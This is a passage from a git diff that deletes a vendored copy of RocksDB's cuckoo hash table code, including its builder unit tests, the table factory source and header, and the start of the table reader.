-    ASSERT_EQ(expected_cuckoo_block_size, cuckoo_block_size);
-    const bool is_last_level_found =
-      *reinterpret_cast<const bool*>(props->user_collected_properties[
-                CuckooTablePropertyNames::kIsLastLevel].data());
-    ASSERT_EQ(expected_is_last_level, is_last_level_found);
-
-    ASSERT_EQ(props->num_entries, keys.size());
-    ASSERT_EQ(props->fixed_key_len, keys.empty() ? 0 : keys[0].size());
-    ASSERT_EQ(props->data_size, expected_unused_bucket.size() *
-        (expected_table_size + expected_cuckoo_block_size - 1));
-    ASSERT_EQ(props->raw_key_size, keys.size()*props->fixed_key_len);
-    ASSERT_EQ(props->column_family_id, 0);
-    ASSERT_EQ(props->column_family_name, kDefaultColumnFamilyName);
-    delete props;
-
-    // Check contents of the bucket.
-    std::vector<bool> keys_found(keys.size(), false);
-    size_t bucket_size = expected_unused_bucket.size();
-    for (uint32_t i = 0; i < table_size + cuckoo_block_size - 1; ++i) {
-      Slice read_slice;
-      ASSERT_OK(file_reader->Read(i * bucket_size, bucket_size, &read_slice,
-                                  nullptr));
-      size_t key_idx =
-          std::find(expected_locations.begin(), expected_locations.end(), i) -
-          expected_locations.begin();
-      if (key_idx == keys.size()) {
-        // i is not one of the expected locations. Empty bucket.
-        if (read_slice.data() == nullptr) {
-          ASSERT_EQ(0, expected_unused_bucket.size());
-        } else {
-          ASSERT_EQ(read_slice.compare(expected_unused_bucket), 0);
-        }
-      } else {
-        keys_found[key_idx] = true;
-        ASSERT_EQ(read_slice.compare(keys[key_idx] + values[key_idx]), 0);
-      }
-    }
-    for (auto key_found : keys_found) {
-      // Check that all keys wereReader found.
-      ASSERT_TRUE(key_found);
-    }
-  }
-
-  std::string GetInternalKey(Slice user_key, bool zero_seqno) {
-    IterKey ikey;
-    ikey.SetInternalKey(user_key, zero_seqno ? 0 : 1000, kTypeValue);
-    return ikey.GetInternalKey().ToString();
-  }
-
-  uint64_t NextPowOf2(uint64_t num) {
-    uint64_t n = 2;
-    while (n <= num) {
-      n *= 2;
-    }
-    return n;
-  }
-
-  uint64_t GetExpectedTableSize(uint64_t num) {
-    return NextPowOf2(static_cast<uint64_t>(num / kHashTableRatio));
-  }
-
-
-  Env* env_;
-  EnvOptions env_options_;
-  std::string fname;
-  const double kHashTableRatio = 0.9;
-};
-
-TEST_F(CuckooBuilderTest, SuccessWithEmptyFile) {
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/EmptyFile";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, 4, 100,
-                             BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  ASSERT_EQ(0UL, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  CheckFileContents({}, {}, {}, "", 2, 2, false);
-}
-
-TEST_F(CuckooBuilderTest, WriteSuccessNoCollisionFullKey) {
-  uint32_t num_hash_fun = 4;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03", "key04"};
-  std::vector<std::string> values = {"v01", "v02", "v03", "v04"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1, 2, 3}},
-      {user_keys[1], {1, 2, 3, 4}},
-      {user_keys[2], {2, 3, 4, 5}},
-      {user_keys[3], {3, 4, 5, 6}}};
-  hash_map = std::move(hm);
-
-  std::vector<uint64_t> expected_locations = {0, 1, 2, 3};
-  std::vector<std::string> keys;
-  for (auto& user_key : user_keys) {
-    keys.push_back(GetInternalKey(user_key, false));
-  }
-  uint64_t expected_table_size = GetExpectedTableSize(keys.size());
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/NoCollisionFullKey";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             100, BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(keys[i]), Slice(values[i]));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  size_t bucket_size = keys[0].size() + values[0].size();
-  ASSERT_EQ(expected_table_size * bucket_size - 1, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  ASSERT_LE(expected_table_size * bucket_size, builder.FileSize());
-
-  std::string expected_unused_bucket = GetInternalKey("key00", true);
-  expected_unused_bucket += std::string(values[0].size(), 'a');
-  CheckFileContents(keys, values, expected_locations,
-      expected_unused_bucket, expected_table_size, 2, false);
-}
-
-TEST_F(CuckooBuilderTest, WriteSuccessWithCollisionFullKey) {
-  uint32_t num_hash_fun = 4;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03", "key04"};
-  std::vector<std::string> values = {"v01", "v02", "v03", "v04"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1, 2, 3}},
-      {user_keys[1], {0, 1, 2, 3}},
-      {user_keys[2], {0, 1, 2, 3}},
-      {user_keys[3], {0, 1, 2, 3}},
-  };
-  hash_map = std::move(hm);
-
-  std::vector<uint64_t> expected_locations = {0, 1, 2, 3};
-  std::vector<std::string> keys;
-  for (auto& user_key : user_keys) {
-    keys.push_back(GetInternalKey(user_key, false));
-  }
-  uint64_t expected_table_size = GetExpectedTableSize(keys.size());
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/WithCollisionFullKey";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             100, BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(keys[i]), Slice(values[i]));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  size_t bucket_size = keys[0].size() + values[0].size();
-  ASSERT_EQ(expected_table_size * bucket_size - 1, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  ASSERT_LE(expected_table_size * bucket_size, builder.FileSize());
-
-  std::string expected_unused_bucket = GetInternalKey("key00", true);
-  expected_unused_bucket += std::string(values[0].size(), 'a');
-  CheckFileContents(keys, values, expected_locations,
-      expected_unused_bucket, expected_table_size, 4, false);
-}
-
-TEST_F(CuckooBuilderTest, WriteSuccessWithCollisionAndCuckooBlock) {
-  uint32_t num_hash_fun = 4;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03", "key04"};
-  std::vector<std::string> values = {"v01", "v02", "v03", "v04"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1, 2, 3}},
-      {user_keys[1], {0, 1, 2, 3}},
-      {user_keys[2], {0, 1, 2, 3}},
-      {user_keys[3], {0, 1, 2, 3}},
-  };
-  hash_map = std::move(hm);
-
-  std::vector<uint64_t> expected_locations = {0, 1, 2, 3};
-  std::vector<std::string> keys;
-  for (auto& user_key : user_keys) {
-    keys.push_back(GetInternalKey(user_key, false));
-  }
-  uint64_t expected_table_size = GetExpectedTableSize(keys.size());
-
-  unique_ptr<WritableFile> writable_file;
-  uint32_t cuckoo_block_size = 2;
-  fname = test::TmpDir() + "/WithCollisionFullKey2";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(
-      file_writer.get(), kHashTableRatio, num_hash_fun, 100,
-      BytewiseComparator(), cuckoo_block_size, false, false, GetSliceHash,
-      0 /* column_family_id */, kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(keys[i]), Slice(values[i]));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  size_t bucket_size = keys[0].size() + values[0].size();
-  ASSERT_EQ(expected_table_size * bucket_size - 1, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  ASSERT_LE(expected_table_size * bucket_size, builder.FileSize());
-
-  std::string expected_unused_bucket = GetInternalKey("key00", true);
-  expected_unused_bucket += std::string(values[0].size(), 'a');
-  CheckFileContents(keys, values, expected_locations,
-      expected_unused_bucket, expected_table_size, 3, false, cuckoo_block_size);
-}
-
-TEST_F(CuckooBuilderTest, WithCollisionPathFullKey) {
-  // Have two hash functions. Insert elements with overlapping hashes.
-  // Finally insert an element with hash value somewhere in the middle
-  // so that it displaces all the elements after that.
-  uint32_t num_hash_fun = 2;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03",
-    "key04", "key05"};
-  std::vector<std::string> values = {"v01", "v02", "v03", "v04", "v05"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1}},
-      {user_keys[1], {1, 2}},
-      {user_keys[2], {2, 3}},
-      {user_keys[3], {3, 4}},
-      {user_keys[4], {0, 2}},
-  };
-  hash_map = std::move(hm);
-
-  std::vector<uint64_t> expected_locations = {0, 1, 3, 4, 2};
-  std::vector<std::string> keys;
-  for (auto& user_key : user_keys) {
-    keys.push_back(GetInternalKey(user_key, false));
-  }
-  uint64_t expected_table_size = GetExpectedTableSize(keys.size());
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/WithCollisionPathFullKey";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             100, BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(keys[i]), Slice(values[i]));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  size_t bucket_size = keys[0].size() + values[0].size();
-  ASSERT_EQ(expected_table_size * bucket_size - 1, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  ASSERT_LE(expected_table_size * bucket_size, builder.FileSize());
-
-  std::string expected_unused_bucket = GetInternalKey("key00", true);
-  expected_unused_bucket += std::string(values[0].size(), 'a');
-  CheckFileContents(keys, values, expected_locations,
-      expected_unused_bucket, expected_table_size, 2, false);
-}
-
-TEST_F(CuckooBuilderTest, WithCollisionPathFullKeyAndCuckooBlock) {
-  uint32_t num_hash_fun = 2;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03",
-    "key04", "key05"};
-  std::vector<std::string> values = {"v01", "v02", "v03", "v04", "v05"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1}},
-      {user_keys[1], {1, 2}},
-      {user_keys[2], {3, 4}},
-      {user_keys[3], {4, 5}},
-      {user_keys[4], {0, 3}},
-  };
-  hash_map = std::move(hm);
-
-  std::vector<uint64_t> expected_locations = {2, 1, 3, 4, 0};
-  std::vector<std::string> keys;
-  for (auto& user_key : user_keys) {
-    keys.push_back(GetInternalKey(user_key, false));
-  }
-  uint64_t expected_table_size = GetExpectedTableSize(keys.size());
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/WithCollisionPathFullKeyAndCuckooBlock";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             100, BytewiseComparator(), 2, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(keys[i]), Slice(values[i]));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  size_t bucket_size = keys[0].size() + values[0].size();
-  ASSERT_EQ(expected_table_size * bucket_size - 1, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  ASSERT_LE(expected_table_size * bucket_size, builder.FileSize());
-
-  std::string expected_unused_bucket = GetInternalKey("key00", true);
-  expected_unused_bucket += std::string(values[0].size(), 'a');
-  CheckFileContents(keys, values, expected_locations,
-      expected_unused_bucket, expected_table_size, 2, false, 2);
-}
-
-TEST_F(CuckooBuilderTest, WriteSuccessNoCollisionUserKey) {
-  uint32_t num_hash_fun = 4;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03", "key04"};
-  std::vector<std::string> values = {"v01", "v02", "v03", "v04"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1, 2, 3}},
-      {user_keys[1], {1, 2, 3, 4}},
-      {user_keys[2], {2, 3, 4, 5}},
-      {user_keys[3], {3, 4, 5, 6}}};
-  hash_map = std::move(hm);
-
-  std::vector<uint64_t> expected_locations = {0, 1, 2, 3};
-  uint64_t expected_table_size = GetExpectedTableSize(user_keys.size());
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/NoCollisionUserKey";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             100, BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(GetInternalKey(user_keys[i], true)), Slice(values[i]));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  size_t bucket_size = user_keys[0].size() + values[0].size();
-  ASSERT_EQ(expected_table_size * bucket_size - 1, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  ASSERT_LE(expected_table_size * bucket_size, builder.FileSize());
-
-  std::string expected_unused_bucket = "key00";
-  expected_unused_bucket += std::string(values[0].size(), 'a');
-  CheckFileContents(user_keys, values, expected_locations,
-      expected_unused_bucket, expected_table_size, 2, true);
-}
-
-TEST_F(CuckooBuilderTest, WriteSuccessWithCollisionUserKey) {
-  uint32_t num_hash_fun = 4;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03", "key04"};
-  std::vector<std::string> values = {"v01", "v02", "v03", "v04"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1, 2, 3}},
-      {user_keys[1], {0, 1, 2, 3}},
-      {user_keys[2], {0, 1, 2, 3}},
-      {user_keys[3], {0, 1, 2, 3}},
-  };
-  hash_map = std::move(hm);
-
-  std::vector<uint64_t> expected_locations = {0, 1, 2, 3};
-  uint64_t expected_table_size = GetExpectedTableSize(user_keys.size());
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/WithCollisionUserKey";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             100, BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(GetInternalKey(user_keys[i], true)), Slice(values[i]));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  size_t bucket_size = user_keys[0].size() + values[0].size();
-  ASSERT_EQ(expected_table_size * bucket_size - 1, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  ASSERT_LE(expected_table_size * bucket_size, builder.FileSize());
-
-  std::string expected_unused_bucket = "key00";
-  expected_unused_bucket += std::string(values[0].size(), 'a');
-  CheckFileContents(user_keys, values, expected_locations,
-      expected_unused_bucket, expected_table_size, 4, true);
-}
-
-TEST_F(CuckooBuilderTest, WithCollisionPathUserKey) {
-  uint32_t num_hash_fun = 2;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03",
-    "key04", "key05"};
-  std::vector<std::string> values = {"v01", "v02", "v03", "v04", "v05"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1}},
-      {user_keys[1], {1, 2}},
-      {user_keys[2], {2, 3}},
-      {user_keys[3], {3, 4}},
-      {user_keys[4], {0, 2}},
-  };
-  hash_map = std::move(hm);
-
-  std::vector<uint64_t> expected_locations = {0, 1, 3, 4, 2};
-  uint64_t expected_table_size = GetExpectedTableSize(user_keys.size());
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/WithCollisionPathUserKey";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             2, BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(GetInternalKey(user_keys[i], true)), Slice(values[i]));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  size_t bucket_size = user_keys[0].size() + values[0].size();
-  ASSERT_EQ(expected_table_size * bucket_size - 1, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  ASSERT_LE(expected_table_size * bucket_size, builder.FileSize());
-
-  std::string expected_unused_bucket = "key00";
-  expected_unused_bucket += std::string(values[0].size(), 'a');
-  CheckFileContents(user_keys, values, expected_locations,
-      expected_unused_bucket, expected_table_size, 2, true);
-}
-
-TEST_F(CuckooBuilderTest, FailWhenCollisionPathTooLong) {
-  // Have two hash functions. Insert elements with overlapping hashes.
-  // Finally try inserting an element with hash value somewhere in the middle
-  // and it should fail because the no. of elements to displace is too high.
-  uint32_t num_hash_fun = 2;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03",
-    "key04", "key05"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1}},
-      {user_keys[1], {1, 2}},
-      {user_keys[2], {2, 3}},
-      {user_keys[3], {3, 4}},
-      {user_keys[4], {0, 1}},
-  };
-  hash_map = std::move(hm);
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/WithCollisionPathUserKey";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             2, BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint32_t i = 0; i < user_keys.size(); i++) {
-    builder.Add(Slice(GetInternalKey(user_keys[i], false)), Slice("value"));
-    ASSERT_EQ(builder.NumEntries(), i + 1);
-    ASSERT_OK(builder.status());
-  }
-  ASSERT_TRUE(builder.Finish().IsNotSupported());
-  ASSERT_OK(file_writer->Close());
-}
-
-TEST_F(CuckooBuilderTest, FailWhenSameKeyInserted) {
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {"repeatedkey", {0, 1, 2, 3}}};
-  hash_map = std::move(hm);
-  uint32_t num_hash_fun = 4;
-  std::string user_key = "repeatedkey";
-
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/FailWhenSameKeyInserted";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, num_hash_fun,
-                             100, BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-
-  builder.Add(Slice(GetInternalKey(user_key, false)), Slice("value1"));
-  ASSERT_EQ(builder.NumEntries(), 1u);
-  ASSERT_OK(builder.status());
-  builder.Add(Slice(GetInternalKey(user_key, true)), Slice("value2"));
-  ASSERT_EQ(builder.NumEntries(), 2u);
-  ASSERT_OK(builder.status());
-
-  ASSERT_TRUE(builder.Finish().IsNotSupported());
-  ASSERT_OK(file_writer->Close());
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as Cuckoo table is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/cuckoo_table_factory.cc b/thirdparty/rocksdb/table/cuckoo_table_factory.cc
deleted file mode 100644
index 2325bcf..0000000
--- a/thirdparty/rocksdb/table/cuckoo_table_factory.cc
+++ /dev/null
@@ -1,72 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include "table/cuckoo_table_factory.h"
-
-#include "db/dbformat.h"
-#include "table/cuckoo_table_builder.h"
-#include "table/cuckoo_table_reader.h"
-
-namespace rocksdb {
-
-Status CuckooTableFactory::NewTableReader(
-    const TableReaderOptions& table_reader_options,
-    unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-    std::unique_ptr<TableReader>* table,
-    bool prefetch_index_and_filter_in_cache) const {
-  std::unique_ptr<CuckooTableReader> new_reader(new CuckooTableReader(
-      table_reader_options.ioptions, std::move(file), file_size,
-      table_reader_options.internal_comparator.user_comparator(), nullptr));
-  Status s = new_reader->status();
-  if (s.ok()) {
-    *table = std::move(new_reader);
-  }
-  return s;
-}
-
-TableBuilder* CuckooTableFactory::NewTableBuilder(
-    const TableBuilderOptions& table_builder_options, uint32_t column_family_id,
-    WritableFileWriter* file) const {
-  // Ignore the skipFIlters flag. Does not apply to this file format
-  //
-
-  // TODO: change builder to take the option struct
-  return new CuckooTableBuilder(
-      file, table_options_.hash_table_ratio, 64,
-      table_options_.max_search_depth,
-      table_builder_options.internal_comparator.user_comparator(),
-      table_options_.cuckoo_block_size, table_options_.use_module_hash,
-      table_options_.identity_as_first_hash, nullptr /* get_slice_hash */,
-      column_family_id, table_builder_options.column_family_name);
-}
-
-std::string CuckooTableFactory::GetPrintableTableOptions() const {
-  std::string ret;
-  ret.reserve(2000);
-  const int kBufferSize = 200;
-  char buffer[kBufferSize];
-
-  snprintf(buffer, kBufferSize, "  hash_table_ratio: %lf\n",
-           table_options_.hash_table_ratio);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  max_search_depth: %u\n",
-           table_options_.max_search_depth);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  cuckoo_block_size: %u\n",
-           table_options_.cuckoo_block_size);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  identity_as_first_hash: %d\n",
-           table_options_.identity_as_first_hash);
-  ret.append(buffer);
-  return ret;
-}
-
-TableFactory* NewCuckooTableFactory(const CuckooTableOptions& table_options) {
-  return new CuckooTableFactory(table_options);
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/cuckoo_table_factory.h b/thirdparty/rocksdb/table/cuckoo_table_factory.h
deleted file mode 100644
index db860c3..0000000
--- a/thirdparty/rocksdb/table/cuckoo_table_factory.h
+++ /dev/null
@@ -1,89 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include "rocksdb/table.h"
-#include "util/murmurhash.h"
-#include "rocksdb/options.h"
-
-namespace rocksdb {
-
-const uint32_t kCuckooMurmurSeedMultiplier = 816922183;
-static inline uint64_t CuckooHash(
-    const Slice& user_key, uint32_t hash_cnt, bool use_module_hash,
-    uint64_t table_size_, bool identity_as_first_hash,
-    uint64_t (*get_slice_hash)(const Slice&, uint32_t, uint64_t)) {
-#if !defined NDEBUG || defined OS_WIN
-  // This part is used only in unit tests but we have to keep it for Windows
-  // build as we run test in both debug and release modes under Windows.
-  if (get_slice_hash != nullptr) {
-    return get_slice_hash(user_key, hash_cnt, table_size_);
-  }
-#endif
-
-  uint64_t value = 0;
-  if (hash_cnt == 0 && identity_as_first_hash) {
-    value = (*reinterpret_cast<const int64_t*>(user_key.data()));
-  } else {
-    value = MurmurHash(user_key.data(), static_cast<int>(user_key.size()),
-                       kCuckooMurmurSeedMultiplier * hash_cnt);
-  }
-  if (use_module_hash) {
-    return value % table_size_;
-  } else {
-    return value & (table_size_ - 1);
-  }
-}
-
-// Cuckoo Table is designed for applications that require fast point lookups
-// but not fast range scans.
-//
-// Some assumptions:
-// - Key length and Value length are fixed.
-// - Does not support Snapshot.
-// - Does not support Merge operations.
-// - Does not support prefix bloom filters.
-class CuckooTableFactory : public TableFactory {
- public:
-  explicit CuckooTableFactory(const CuckooTableOptions& table_options)
-    : table_options_(table_options) {}
-  ~CuckooTableFactory() {}
-
-  const char* Name() const override { return "CuckooTable"; }
-
-  Status NewTableReader(
-      const TableReaderOptions& table_reader_options,
-      unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-      unique_ptr<TableReader>* table,
-      bool prefetch_index_and_filter_in_cache = true) const override;
-
-  TableBuilder* NewTableBuilder(
-      const TableBuilderOptions& table_builder_options,
-      uint32_t column_family_id, WritableFileWriter* file) const override;
-
-  // Sanitizes the specified DB Options.
-  Status SanitizeOptions(const DBOptions& db_opts,
-                         const ColumnFamilyOptions& cf_opts) const override {
-    return Status::OK();
-  }
-
-  std::string GetPrintableTableOptions() const override;
-
-  void* GetOptions() override { return &table_options_; }
-
-  Status GetOptionString(std::string* opt_string,
-                         const std::string& delimiter) const override {
-    return Status::OK();
-  }
-
- private:
-  CuckooTableOptions table_options_;
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/cuckoo_table_reader.cc b/thirdparty/rocksdb/table/cuckoo_table_reader.cc
deleted file mode 100644
index 9ceceba..0000000
--- a/thirdparty/rocksdb/table/cuckoo_table_reader.cc
+++ /dev/null
@@ -1,385 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-#include "table/cuckoo_table_reader.h"
-
-#include <algorithm>
-#include <limits>
-#include <string>
-#include <utility>
-#include <vector>
-#include "rocksdb/iterator.h"
-#include "rocksdb/table.h"
-#include "table/internal_iterator.h"
-#include "table/meta_blocks.h"
-#include "table/cuckoo_table_factory.h"
-#include "table/get_context.h"
-#include "util/arena.h"
-#include "util/coding.h"
-
-namespace rocksdb {
